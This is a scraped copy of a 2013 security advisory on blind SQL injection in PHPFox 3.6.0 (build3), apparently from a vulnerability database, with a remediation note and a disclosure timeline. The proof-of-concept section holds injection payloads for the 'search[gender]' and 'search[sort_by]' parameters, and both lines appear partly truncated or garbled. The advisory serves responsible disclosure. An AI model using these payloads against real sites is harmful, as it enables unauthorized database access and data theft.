Lucene search

HistorySep 09, 2013 - 12:00 a.m.

PHPFox v3.6.0 (build3) Multiple SQL Injection vulnerabilities


PHPFox v3.6.0 (build3) Multiple SQL Injection vulnerabilities

== Description ==

  • Software link:
  • Affected versions: version 3.6.0 (build3) is vulnerable. Other
    versions might be affected as well.
  • Vulnerability discovered by: Matias Fontanini

== Vulnerabilities ==
When performing POST requests to /user/browse/view_/, the
"search[gender]" and "search[sort_by]" parameters are not correctly
sanitized before being used to construct SQL queries, making them
vulnerable to Blind SQL Injection attacks.

== Proof of concept ==

  • For the "search[gender]" parameter, using the condition "1=0" so
    that no results are returned:

POST /user/browse/view_/
and 1=0search[from]=&search[to]=&search[country]=&null=1&search[city]=&search[zip]=&search[keyword]=&search[type]=0&search[submit]=Submit&custom[1]=&custom[2]=&custom[3]=&custom[4]=&custom[5]=&custom[6]=&custom[7]=&search[sort]=u.last_login&search[sort_by]=DESC

  • The "search[sort_by]" parameter is inserted in a "order by" clause.
    Therefore, an attacker could exploit it by making the application sort
    the results based on a different criteria, depending on whether the
    query was successful:

POST /user/browse/view_/
when (select 1 from dual) then birthday_search else password end)

== Solution ==
Upgrade the product to the 3.6.0 (build6) version. Note that builds 4
and 5 also contain the vulnerability present in the "search[sort_by]"
parameter, but not the other one.

== Report timeline ==
[2013-07-30] Vulnerability reported to vendor.
[2013-07-30] Developers answered back indicating that an update would
be released soon.
[2013-08-07] PHPFox 3.6.0 (build6) was released, which fixed all of
the issues reported.
[2013-08-07] Public disclosure.